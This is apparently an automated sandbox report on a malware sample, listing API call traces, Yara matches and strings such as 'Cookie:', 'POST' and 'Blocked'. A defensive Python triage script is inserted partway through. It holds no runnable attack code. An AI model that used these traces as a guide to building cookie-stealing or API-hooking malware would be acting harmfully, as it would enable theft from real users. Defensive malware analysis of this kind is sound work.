                                                                                                                                        • API ID: CloseHandleObjectSingleWait
                                                                                                                                        • String ID: ]hF$qhF
                                                                                                                                        • API String ID: 528846559-2760001747

                                                                                                                                        APIs
                                                                                                                                        • UnregisterWait.KERNEL32(?), ref: 0044FD90
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000064,?,?,?,00000000), ref: 0044FDE1
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044FDFD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$FreeHeapObjectSingleUnregister
                                                                                                                                        • String ID: ShF
                                                                                                                                        • API String ID: 3104896675-2736803057

                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 00453ACF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00443500,?,?,00000001), ref: 00453B2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                        • String ID: &dF$cF
                                                                                                                                        • API String ID: 2488874121-198834661

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShellWindow
                                                                                                                                        • String ID: gmF$qmF${mF
                                                                                                                                        • API String ID: 2831631499-4145778643

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,?,?), ref: 0044218B
                                                                                                                                        • StrToIntExA.SHLWAPI(00007830,00000001,?), ref: 0044219D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: 0x$7gF
                                                                                                                                        • API String ID: 3510742995-3345866681

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00441333
                                                                                                                                        • lstrcmp.KERNEL32(?,?), ref: 00441357
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00441371
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeavelstrcmp
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 4188137280-3652835401

                                                                                                                                        APIs
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045ACEB
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045ACFC
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045AD14
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045AD2E
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0045AD43
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap$CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1910495013-0
                                                                                                                                        • Opcode ID: 273550f28d3f42e7ddb89d741d1259f78ba439d90661fce7ef419045c3c74c52
                                                                                                                                        • Instruction ID: 53ffc14d0f6137a384dd5bec5875efa8125d6d723f4d8e1ad5c6d2716cc29ff4
                                                                                                                                        • Opcode Fuzzy Hash: 273550f28d3f42e7ddb89d741d1259f78ba439d90661fce7ef419045c3c74c52
                                                                                                                                        • Instruction Fuzzy Hash: DF315A70601121AFC712DF65DD88C1AFBA6FF05B123544A16F809C7622C739FCA5CB9A
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0044DB26: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0044DB41
  • Part of subcall function 0044DB26: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DB8F
  • Part of subcall function 0044DB26: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 0044DBA1
  • Part of subcall function 0044DB26: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0044DBF2
• GetLastError.KERNEL32(?,?,00000001), ref: 00448C4A
• FreeLibrary.KERNEL32(?,?,00000001), ref: 00448CB2
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
• String ID:
• API String ID: 1730969706-0
• Opcode ID: b737bc9b79add23105b36d0c28b081d7bd78c643b41f74985bb3a627f8ace1d1
• Instruction ID: c2015e2f8e7cdf4813e94837097ebfae97044b227f8b7542ac9e495d24665cdd
• Opcode Fuzzy Hash: b737bc9b79add23105b36d0c28b081d7bd78c643b41f74985bb3a627f8ace1d1
• Instruction Fuzzy Hash: 1771DFB1E00209EFDF00DFA5C9849AEBBB9FF48304B10856EE515A7251DB35AD81CF64
Uniqueness
Uniqueness Score: -1.00%
APIs
• _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00450879
• _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0045088F
• memset.NTDLL ref: 0045092F
• memset.NTDLL ref: 0045093F
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memset$_allmul_aulldiv
• String ID:
• API String ID: 3041852380-0
• Opcode ID: b0b94d6ac61dcf3843f36c251d69647dc6b487ddf63aa569b67a7cd62c2c0da2
• Instruction ID: 070b7a1da95d2692692dcbc3649c8cb7202e94715be5cae7d27be9cd779674e0
• Opcode Fuzzy Hash: b0b94d6ac61dcf3843f36c251d69647dc6b487ddf63aa569b67a7cd62c2c0da2
• Instruction Fuzzy Hash: FE41B435A00209ABDB10AF99CC41FEE7774EF44314F10852BFD1AAB282E7789D59CB95
Uniqueness
Uniqueness Score: -1.00%
APIs
• HeapFree.KERNEL32(00000000,?,?,?,00000000,`F,00000000,74B05520), ref: 0046323B
• HeapFree.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00463333
• HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0046336C
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: `F
• API String ID: 3298025750-3520748611
• Opcode ID: 6a60be435a5ca24d7d80a9ee62072c77e85cc9b5641523562759c5ebb9b6debd
• Instruction ID: b60f5b2c5a7e35d1a1eeab1c1b2234c118511edb54dc90a3450521c0cfcaad59
• Opcode Fuzzy Hash: 6a60be435a5ca24d7d80a9ee62072c77e85cc9b5641523562759c5ebb9b6debd
• Instruction Fuzzy Hash: 1F416F31E00249EFDF20DFA5DD409AEB7B5FB08346F14846AE801E2250F7349E85CB5A
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0044E261: RtlAllocateHeap.NTDLL(00000000,?), ref: 0044E293
  • Part of subcall function 0044E261: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,0044C2DA,?,00000022), ref: 0044E2B8
• HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
• HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
• HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Free$Allocate
• String ID: https://
• API String ID: 3472947110-4275131719
• Opcode ID: 40a997bc61c7f6331dbca602844c267e2aa5871b07e667abe913710fb57424bd
• Instruction ID: 31b23554c1f923aaf266610d7a83c12147f302a2e17e6ebd8750ba6f80e9cf18
• Opcode Fuzzy Hash: 40a997bc61c7f6331dbca602844c267e2aa5871b07e667abe913710fb57424bd
• Instruction Fuzzy Hash: FD21DD31900118BBEF22AF51DC84E9F7F69EB01744F00803BF804A6162D7B98E95DB99
Uniqueness
Uniqueness Score: -1.00%
APIs
• TlsGetValue.KERNEL32(?), ref: 0045BD19
• SetEvent.KERNEL32(?), ref: 0045BD63
• TlsSetValue.KERNEL32(00000001), ref: 0045BD9D
• TlsSetValue.KERNEL32(00000000), ref: 0045BDB9
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Value$Event
• String ID:
• API String ID: 3803239005-0
• Opcode ID: 7d0dd516aac162912830fe7069b5f075a8b83e5c70edba7e8d594c3bce639d84
• Instruction ID: e321aaec4b2eb9a9aa80aef525085c1fd7f741a518a92428e05bbf9f0e9cc37a
• Opcode Fuzzy Hash: 7d0dd516aac162912830fe7069b5f075a8b83e5c70edba7e8d594c3bce639d84
• Instruction Fuzzy Hash: 6921E071200204EFDF259F19DC8599B7BB6FF41352B10042AF812CA2B1D7B9EC99DB89
Uniqueness
Uniqueness Score: -1.00%
APIs
• RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00465C14
• RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00465C2F
• GetLastError.KERNEL32 ref: 00465C9D
• GetLastError.KERNEL32 ref: 00465CAC
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0
• Opcode ID: d6f83a45f394f8c4999d9b1af87b15d9f25f5abb0bfb888e16f32d2ad05926a7
• Instruction ID: f0ff633d356650140c6fcf429968a29519c3a7ad36d533e737d3473a71b9f1ea
• Opcode Fuzzy Hash: d6f83a45f394f8c4999d9b1af87b15d9f25f5abb0bfb888e16f32d2ad05926a7
• Instruction Fuzzy Hash: C5211975900608EFCB128F99DD44ADE7BB8FF45710F11415AF901A2250EB74DA12EB5A
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.NTDLL ref: 00458E19
• lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 00458E5D
• OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00458EA3
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 00458EC6
  • Part of subcall function 00450A3B: GetTickCount.KERNEL32 ref: 00450A4B
  • Part of subcall function 00450A3B: CreateFileW.KERNEL32(0046088E,80000000,00000003,0046E0F8,00000003,00000000,00000000,?,0046088E,?,00000000,?,00000000), ref: 00450A68
  • Part of subcall function 00450A3B: GetFileSize.KERNEL32(0046088E,00000000,Local\,00000001,?,0046088E,?,00000000,?,00000000), ref: 00450A94
  • Part of subcall function 00450A3B: CreateFileMappingA.KERNEL32(0046088E,0046E0F8,00000002,00000000,00000000,0046088E), ref: 00450AA8
  • Part of subcall function 00450A3B: lstrlen.KERNEL32(0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AC4
  • Part of subcall function 00450A3B: lstrcpy.KERNEL32(?,0046088E), ref: 00450AD4
  • Part of subcall function 00450A3B: HeapFree.KERNEL32(00000000,0046088E,?,0046088E,?,00000000,?,00000000), ref: 00450AEF
  • Part of subcall function 00450A3B: CloseHandle.KERNEL32(0046088E,Local\,00000001,?,0046088E), ref: 00450B01
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
• String ID:
• API String ID: 3239194699-0
• Opcode ID: 738508ca0dd423cde6b822be9d47f6e8bca716df7f857db20e50697d3b14f551
• Instruction ID: aa7b9aa9839b6836a663a67e03c13bfa34ffdb8210aebbcf1343906107c6d70f
• Opcode Fuzzy Hash: 738508ca0dd423cde6b822be9d47f6e8bca716df7f857db20e50697d3b14f551
• Instruction Fuzzy Hash: C6217171500208EBDB21DF66CC45DEE7BB8EF84316F10052AFD14E2262EF388949CB55
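Two of the traces above are worth correlating rather than reading call by call: the subcall at 0044DB26 opens HKEY_LOCAL_MACHINE\Software\Microsoft\WAB\DLLPath (80000002 is the HKEY_LOCAL_MACHINE root handle), loads the resulting DLL with LoadLibraryA and resolves WABOpen, which is how code locates the Windows Address Book library through its registered path; the function at 00458E19 and its subcall 00450A3B open and create file mappings with a "Local\" namespace string on the stack, i.e. a named section object. The following script is an added example, not part of the report or of the analysed sample: it parses the report's API trace lines into structured calls, decodes the registry root handle, and applies two triage rules (the rule names, the `Call` class and the helper functions are this example's own). The sample trace is constructed by concatenating lines copied from the two report blocks so the script runs offline.

```python
"""Parse sandbox per-function API traces and flag two call chains.

Added example; not code from the report or from the analysed sample.
SAMPLE_TRACE is constructed from lines copied out of two report blocks.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One trace line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(args), then "ref: XXXX".  Lines such as "memset.NTDLL ref: ..."
# carry no argument list, so the parenthesised group is optional.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry root handles, as passed in the first RegOpenKey argument.
HKEY_NAMES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the subcall function, if nested


def parse_trace(text: str) -> List[Call]:
    """Turn report trace lines into Call records; non-matching lines (section
    headers such as 'APIs' or 'Memory Dump Source') are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def reg_root_name(call: Call) -> Optional[str]:
    """Decode the root handle of a RegOpenKey* call, or None if not applicable."""
    if call.api.startswith("RegOpenKey") and call.args:
        return HKEY_NAMES.get(call.args[0].upper())
    return None


def find_wab_loader(calls: List[Call]) -> Optional[List[str]]:
    """Rule 1 (example's own name): RegOpenKey on WAB\\DLLPath, followed by
    LoadLibrary*, followed by GetProcAddress(WABOpen).  Returns the refs of the
    three calls in trace order, or None when the chain is incomplete."""
    state, refs = 0, []
    for c in calls:
        if state == 0 and c.api.startswith("RegOpenKey") and any("WAB\\DLLPath" in a for a in c.args):
            state, refs = 1, [c.ref]
        elif state == 1 and c.api.startswith("LoadLibrary"):
            state, refs = 2, refs + [c.ref]
        elif state == 2 and c.api == "GetProcAddress" and "WABOpen" in c.args:
            return refs + [c.ref]
    return None


def find_named_mapping(calls: List[Call]) -> Optional[Dict[str, List[str]]]:
    """Rule 2 (example's own name): a file-mapping create/open call together
    with a 'Local\\' or 'Global\\' namespace string anywhere in the trace's
    arguments (the report shows the prefix as stack residue, not as a direct
    argument, so the whole trace is searched)."""
    mapping_refs = [c.ref for c in calls if c.api.startswith(("CreateFileMapping", "OpenFileMapping"))]
    names = sorted({a for c in calls for a in c.args if a.startswith(("Local\\", "Global\\"))})
    if mapping_refs and names:
        return {"mapping_refs": mapping_refs, "names": names}
    return None


def triage(text: str) -> dict:
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "reg_roots": [reg_root_name(c) for c in calls if reg_root_name(c)],
        "wab_loader": find_wab_loader(calls),
        "named_mapping": find_named_mapping(calls),
    }


# Constructed input: lines copied from the report blocks for 0044DB26 and 00450A3B.
SAMPLE_TRACE = r"""
  • Part of subcall function 0044DB26: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0044DB41
  • Part of subcall function 0044DB26: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0044DB8F
  • Part of subcall function 0044DB26: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 0044DBA1
  • Part of subcall function 0044DB26: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0044DBF2
• GetLastError.KERNEL32(?,?,00000001), ref: 00448C4A
• FreeLibrary.KERNEL32(?,?,00000001), ref: 00448CB2
• memset.NTDLL ref: 00458E19
• OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00458EA3
  • Part of subcall function 00450A3B: GetFileSize.KERNEL32(0046088E,00000000,Local\,00000001,?,0046088E,?,00000000,?,00000000), ref: 00450A94
  • Part of subcall function 00450A3B: CreateFileMappingA.KERNEL32(0046088E,0046E0F8,00000002,00000000,00000000,0046088E), ref: 00450AA8
"""

if __name__ == "__main__":
    print(triage(SAMPLE_TRACE))
```

The two rules return the `ref:` addresses of the calls that fired, so a finding can be taken straight back to the disassembly offsets in the report; the state machine in `find_wab_loader` requires the three calls in order, which keeps an unrelated GetProcAddress elsewhere in the trace from matching.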
Uniqueness
Uniqueness Score: -1.00%
APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF18
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045CF30
• memcpy.NTDLL(00000000,?,-00000008,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF74
• memcpy.NTDLL(00000001,?,00000001), ref: 0045CF95
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memcpy$AllocateHeaplstrlen
• String ID:
• API String ID: 1819133394-0
• Opcode ID: 555c2caf03564f973b076ca6325678e24f6c1f07a30cd1d8b3be44d1b9eb8390
• Instruction ID: 81d33508a9035cbd4c8d567098bc3dd856f9d8d31f6b7e0c4d77b10693b00b07
• Opcode Fuzzy Hash: 555c2caf03564f973b076ca6325678e24f6c1f07a30cd1d8b3be44d1b9eb8390
• Instruction Fuzzy Hash: 84118C76A04254AFC7108B66CCC8D9EBFA9DF81351F0902BFF805D7192E6B44E09C756
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044EDF9
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE0B
• ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE23
• CloseHandle.KERNEL32(?,?,?,?,?,?,0044C683,4C72644C), ref: 0044EE3E
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: File$CloseCreateHandleModuleNamePointerRead
• String ID:
• API String ID: 1352878660-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?,?,?,?,004440F5), ref: 00445560
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• lstrcpy.KERNEL32(00000000,?), ref: 00445577
• StrChrA.SHLWAPI(00000000,0000002E,?,?,004440F5), ref: 00445580
• GetModuleHandleA.KERNEL32(00000000,?,?,004440F5), ref: 0044559E
  • Part of subcall function 004479AD: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002), ref: 00447A84
  • Part of subcall function 004479AD: VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001), ref: 00447A9F
  • Part of subcall function 004479AD: RtlEnterCriticalSection.NTDLL(0046E240), ref: 00447AC3
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
• String ID:
• API String ID: 105881616-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0044467E
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004446A2
• RegCloseKey.ADVAPI32(?), ref: 004446FA
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 004446CB
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: QueryValue$AllocateCloseHeapOpen
• String ID:
• API String ID: 453107315-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF18
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0045CF30
• memcpy.NTDLL(00000000,?,-00000008,?,?,?,00459A37,?,?,00444403,?,03BD8D60), ref: 0045CF74
• memcpy.NTDLL(00000001,?,00000001), ref: 0045CF95
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: memcpy$AllocateHeaplstrlen
• String ID:
• API String ID: 1819133394-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(?,?), ref: 0044281C
• StrTrimA.SHLWAPI(?,0046A48C,00000001), ref: 0044283B
• StrChrA.SHLWAPI(?,?), ref: 0044284C
• StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044285E
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Trim
• String ID:
• API String ID: 3043112668-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004509D0: RtlAllocateHeap.NTDLL(00000000,?), ref: 004509FF
  • Part of subcall function 004509D0: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,00443498,?), ref: 00450A22
• HeapFree.KERNEL32(00000000,00000000,?), ref: 004434C2
  • Part of subcall function 0045F820: lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
  • Part of subcall function 0045F820: lstrlen.KERNEL32(?), ref: 0045F83F
  • Part of subcall function 0045F820: lstrlen.KERNEL32(?), ref: 0045F8AA
  • Part of subcall function 0045F820: RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
  • Part of subcall function 0045F820: memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
  • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
  • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
  • Part of subcall function 0045F820: memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
  • Part of subcall function 0045F820: memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
• HeapFree.KERNEL32(00000000,?,?,00000001), ref: 0044350E
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: Heapmemcpy$Freelstrlen$Allocate
• String ID: Cookie: $https://
• API String ID: 2465664858-1563071917
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00459B11,00000000,00000000), ref: 0045F53E
• GetLastError.KERNEL32(?,00000000,?,00459B11,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0045ABD6,?,0000001E), ref: 0045F546
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: ByteCharErrorLastMultiWide
• String ID:
• API String ID: 203985260-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,0044DB0E,?,00000000,?,0000EA60,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 0045B96A
• GetLastError.KERNEL32(?,?,?,0044DB0E,?,00000000,?,0000EA60,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 0045B9C6
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: ErrorLast
• String ID: +mF$5mF
• API String ID: 1452528299-1897131304
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?), ref: 00464A7D
• RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00464AA3
• lstrcpy.KERNEL32(00000014,?), ref: 00464AC8
• memcpy.NTDLL(?,?,?), ref: 00464AD5
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Similarity
• API ID: AllocateHeaplstrcpylstrlenmemcpy
• String ID:
• API String ID: 1388643974-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00444734
                                                                                                                                        • lstrlen.KERNEL32(03BD8BC0), ref: 00444755
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0044476D
                                                                                                                                        • lstrcpy.KERNEL32(00000000,03BD8BC0), ref: 0044477F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1929783139-0
                                                                                                                                        • Opcode ID: ddd2f0e738d68837ac3aa1fb8fdc462c81835234e064260185aad9f97d2afd88
                                                                                                                                        • Instruction ID: 4c18bf96f4998cd641b42ccbaa436662ca12368a82307053488e700b17a7b8d3
                                                                                                                                        • Opcode Fuzzy Hash: ddd2f0e738d68837ac3aa1fb8fdc462c81835234e064260185aad9f97d2afd88
                                                                                                                                        • Instruction Fuzzy Hash: 96010872A00344ABD7119BA9AC88F5F7BBCAB89301F100569E90AD3301EB749909C769
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(?,POST), ref: 0045898D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00450C92,00000000,00450C92,?), ref: 004589BA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeaplstrcmpi
                                                                                                                                        • String ID: POST$`F
                                                                                                                                        • API String ID: 3337503550-3695441687
                                                                                                                                        • Opcode ID: dd77979906000d674fd2a531589a2dccb84ea776144f5fe45a351b52e8be5f1b
                                                                                                                                        • Instruction ID: 5167bd3e6a0d961e88d330ede0c977c9b1587ec516c5c602b04d0c11bfa02387
                                                                                                                                        • Opcode Fuzzy Hash: dd77979906000d674fd2a531589a2dccb84ea776144f5fe45a351b52e8be5f1b
                                                                                                                                        • Instruction Fuzzy Hash: F1118270A01105ABCB20AF56DD05AAE7BA6BF41316F14403EEC01B6261EF74DD49CA8A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(?,Blocked), ref: 004637DE
                                                                                                                                        • lstrcmpi.KERNEL32(?,Main), ref: 00463813
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                        • String ID: Blocked$Main
                                                                                                                                        • API String ID: 1586166983-1966386946
                                                                                                                                        • Opcode ID: ea6de2c27273dc3b127c7c6f33f00d2ee47782c636319d51fdfebae61c0d02b1
                                                                                                                                        • Instruction ID: 862527eb9df0ba85acf408749dacb75f1a913558d258e7245ae115503286526e
                                                                                                                                        • Opcode Fuzzy Hash: ea6de2c27273dc3b127c7c6f33f00d2ee47782c636319d51fdfebae61c0d02b1
